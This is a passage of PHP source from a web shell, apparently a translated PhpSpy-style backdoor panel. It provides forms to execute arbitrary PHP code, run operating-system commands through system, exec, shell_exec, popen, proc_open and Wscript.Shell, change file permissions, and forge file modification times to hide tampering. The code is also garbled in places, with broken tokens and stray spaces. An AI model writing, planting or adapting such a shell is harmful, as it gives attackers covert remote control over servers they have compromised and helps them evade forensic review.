}//end rename

elseif ($_GET['action'] == "eval") {
$action = "?dir=".urlencode($dir)."";
$tb- >tableheader();
$tb->formheader(''.$action.' "target="_blank' ,'Execute php script');
$tb->tdbody($tb->maketextarea( 'phpcode',$contents));
$tb->formfooter('1','30');

}
elseif ($_GET['action'] == "fileperm") {
$action = "?dir=".urlencode($dir)."&file=".$file;
$tb->tableheader();
$tb->formheader($action,'Modify file attributes');
$ tb->tdbody('Modify the attributes of '.$file.' to: '.$tb->makeinput('fileperm',substr(base_convert(fileperms($dir.'/'.$file),10, 8),-4)));
$tb->makehidden('file',$file);
$tb->makehidden('dir',urlencode($dir));
$tb->makehidden('do','editfileperm');
$tb->formfooter('1','30');
}//end fileperm

elseif ($_GET['action'] == "newtime") {
$action = "?dir=".urlencode($dir);
$cachemonth = array('January'=>1,'February'=>2,'March'=> ;3,'April'=>4,'May'=>5,'June'=>6,'July'=>7,'August'=>8,'September'=>9 ,'October'=>10,'November'=>11,'December'=>12);
$tb->tableheader();
$tb->formheader($action,'Clone file Last modification time');
$tb->tdbody("Modify file: ".$tb->makeinput('curfile',$file,'readonly')." → Target file: ".$tb-> ;makeinput('tarfile','Full path and file name required'),'center','2','30');
$tb->makehidden('do','domodtime');
$ tb->formfooter('','30');
$tb->formheader($action,'Last modification time of custom file');
$tb->tdbody('
< ul>
  • A typical range of valid timestamps is from Friday 13 December 1901 20:45:54 GMT to Tuesday 19 January 2038 03:14:07
    (This date is based on (from the minimum and maximum values ​​of 32-bit signed integers)
  • Note: The day is between 01 and 30, the hour is between 0 and 24, and the minutes and seconds are between 0 and 60 !
  • ','left');
    $tb->tdbody('Current file name: '.$file);
    $tb->makehidden('curfile',$ file);
    $tb->tdbody('Modify to: '.$tb->makeinput('year','1984','','text','4').'Year'.$tb ->makeselect(array('name'=>'month','option'=>$cachemonth,'selected'=>'October')).' month'.$tb->makeinput(' data','18','','text','2').' day'.$tb->makeinput('hour','20','','text','2'). 'When'.$tb->makeinput('minute','00','','text','2').' Minute'.$tb->makeinput('second','00', '','text','2').' seconds','center','2','30');
    $tb->makehidden('do','modmytime');
    $tb- >formfooter('1','30');
    }//end newtime

    elseif ($_GET['action'] == "shell") {
    $action = "??action=shell&dir=". urlencode($dir);
    $tb->tableheader();
    $tb->tdheader('WebShell Mode');
    if (substr(PHP_OS, 0, 3) == 'WIN') {
    $ program = isset($_POST['program']) ? $_POST['program'] : "c:winntsystem32cmd.exe";
    $prog = isset($_POST['prog']) ? $_POST['prog' ] : "/c net start > ".$pathname."/log.txt";
    echo "
    n";
    $tb->tdbody('Run the program without echo→ File: '.$tb->makeinput('program',$program).' Parameters: '.$tb->makeinput ('prog',$prog,'','text','40').' '.$tb->makeinput('','Run','','submit'),'center',' 2','35');
    $tb->makehidden('do','programrun');
    echo "
    n";
    }
    echo "
    n";
    if(isset($_POST['cmd'])) $cmd = $_POST['cmd'];
    $tb ->tdbody('Tips: If the output result is incomplete, it is recommended to write the output result to a file. This way you can get the entire content. ');
    $tb->tdbody('If the proc_open function is not the default winnt system, please do it yourself Set up and use, modify it yourself and remember to write to exit, otherwise an unfinished process will be left on the host.');
    $tb->tdbody('The location of the cmd program to be used by the proc_open function:'.$tb-> ;makeinput('cmd',$cmd,'','text','30').'(If it is a Linux system, you can modify it yourself)');
    $execfuncs = (substr(PHP_OS, 0, 3) == 'WIN') ? array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','wscript'=>'Wscript.Shell','proc_open'=>'proc_open') : array('system'=>'system','passthru'=>'passthru','exec'=>'exec','shell_exec'=>'shell_exec','popen'=>'popen','proc_open'=>'proc_open'); 
    $tb->tdbody('选择执行函数: '.$tb->makeselect(array('name'=>'execfunc','option'=>$execfuncs,'selected'=>$execfunc)).' 输入命令: '.$tb->makeinput('command',$_POST['command'],'','text','60').' '.$tb->makeinput('','Run','','submit')); 
    ?>